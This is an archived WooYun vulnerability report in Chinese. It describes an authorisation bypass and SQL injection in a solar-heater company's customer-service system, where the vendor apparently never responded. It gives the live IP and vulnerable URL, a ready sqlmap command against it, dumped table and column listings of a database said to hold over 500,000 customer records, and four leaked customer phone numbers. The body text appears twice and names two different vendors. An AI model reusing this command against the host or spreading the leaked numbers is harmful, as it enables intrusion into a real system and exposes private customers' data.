当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145726

漏洞标题:亿家能太阳能某系统一处越权\SQL注射泄露51W客户信息(姓名/地址/号码/安装单等)

相关厂商:亿家能太阳能

漏洞作者: 路人甲

提交时间:2015-10-10 12:05

修复时间:2015-11-24 12:06

公开时间:2015-11-24 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

反正我是没用太阳能热水器

详细说明:

亿家能太阳能客服系统

http://218.56.138.156:8080/web/manager/


存在越权url

http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456


K1.png


k2.png


其中agentNo是可以任意变换的
此处也是一处sql注入漏洞

sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs


k3.png


查看当前库是ecs

K4.png


列表列数据量

Database: ecs
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.chanpinxinxi               | 1232569 |
| dbo.salebill                   | 989634  |
| dbo.fahuoxinxi                 | 971554  |
| dbo.vistorBack                 | 518859  |
| dbo.building                   | 515518  |
| dbo.ProductSwap                | 407312  |
| dbo.UserTable                  | 212813  |
| dbo.callerWorkStat             | 150036  |
| dbo.LinkTelArea                | 138625  |
| dbo.telInfo                    | 138280  |
| dbo.AssessmentFactorInfo       | 42993   |
| dbo.SettleAccountsItems        | 36245   |
| dbo.HistorySettleAccountsItems | 17834   |
| dbo.Tmp                        | 16654   |
| dbo.xilieinfo                  | 7161    |
| dbo.city                       | 3238    |
| dbo.UserRole                   | 2595    |
| dbo.refer                      | 2584    |
| dbo.Pd_Process                 | 2582    |
| dbo.pd                         | 2484    |
| dbo.v_goods                    | 2445    |


工单回访表:

vistorBack


K5.png


列columns

Table: vistorBack
[32 columns]
+------------------+---------+
| Column           | Type    |
+------------------+---------+
| AgentNo          | varchar |
| BuildingResult   | varchar |
| callTel          | varchar |
| Card             | varchar |
| content          | varchar |
| firstVistorDate  | varchar |
| Id               | bigint  |
| Isbw             | int     |
| IsDel            | varchar |
| Isgd             | int     |
| Ispj             | int     |
| IsVisitor        | varchar |
| LeaveBillNo      | varchar |
| LeaveBillNo2     | varchar |
| memom            | varchar |
| openTime         | varchar |
| operateDate      | varchar |
| other            | varchar |
| Province         | varchar |
| Reason           | varchar |
| require          | varchar |
| satisfaction     | varchar |
| secondVistorDate | varchar |
| ServiceType      | varchar |
| thirdVistorDate  | varchar |
| verify           | int     |
| verifyContent    | varchar |
| verifyDate       | varchar |
| verifyPerson     | varchar |
| verifyValidate   | int     |
| VistorTime       | varchar |
| zt               | varchar |
+------------------+---------+


涉及客户信息,列号码字段数据演示:

Database: ecs
Table: vistorBack
[4 entries]
+--------------+
| callTel      |
+--------------+
| 051683202555 |
| 83686959     |
| 85696735     |
| 87792024     |
+--------------+

漏洞证明:

皇明太阳能客服系统

http://218.56.138.156:8080/web/manager/


存在越权url

http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456


K1.png


k2.png


其中agentNo是可以任意变换的
此处也是一处sql注入漏洞

sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs


k3.png


查看当前库是ecs

K4.png


列表列数据量

Database: ecs
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.chanpinxinxi               | 1232569 |
| dbo.salebill                   | 989634  |
| dbo.fahuoxinxi                 | 971554  |
| dbo.vistorBack                 | 518859  |
| dbo.building                   | 515518  |
| dbo.ProductSwap                | 407312  |
| dbo.UserTable                  | 212813  |
| dbo.callerWorkStat             | 150036  |
| dbo.LinkTelArea                | 138625  |
| dbo.telInfo                    | 138280  |
| dbo.AssessmentFactorInfo       | 42993   |
| dbo.SettleAccountsItems        | 36245   |
| dbo.HistorySettleAccountsItems | 17834   |
| dbo.Tmp                        | 16654   |
| dbo.xilieinfo                  | 7161    |
| dbo.city                       | 3238    |
| dbo.UserRole                   | 2595    |
| dbo.refer                      | 2584    |
| dbo.Pd_Process                 | 2582    |
| dbo.pd                         | 2484    |
| dbo.v_goods                    | 2445    |


工单回访表:

vistorBack


K5.png


列columns

Table: vistorBack
[32 columns]
+------------------+---------+
| Column           | Type    |
+------------------+---------+
| AgentNo          | varchar |
| BuildingResult   | varchar |
| callTel          | varchar |
| Card             | varchar |
| content          | varchar |
| firstVistorDate  | varchar |
| Id               | bigint  |
| Isbw             | int     |
| IsDel            | varchar |
| Isgd             | int     |
| Ispj             | int     |
| IsVisitor        | varchar |
| LeaveBillNo      | varchar |
| LeaveBillNo2     | varchar |
| memom            | varchar |
| openTime         | varchar |
| operateDate      | varchar |
| other            | varchar |
| Province         | varchar |
| Reason           | varchar |
| require          | varchar |
| satisfaction     | varchar |
| secondVistorDate | varchar |
| ServiceType      | varchar |
| thirdVistorDate  | varchar |
| verify           | int     |
| verifyContent    | varchar |
| verifyDate       | varchar |
| verifyPerson     | varchar |
| verifyValidate   | int     |
| VistorTime       | varchar |
| zt               | varchar |
+------------------+---------+


涉及客户信息,列号码字段数据演示:

Database: ecs
Table: vistorBack
[4 entries]
+--------------+
| callTel      |
+--------------+
| 051683202555 |
| 83686959     |
| 85696735     |
| 87792024     |
+--------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)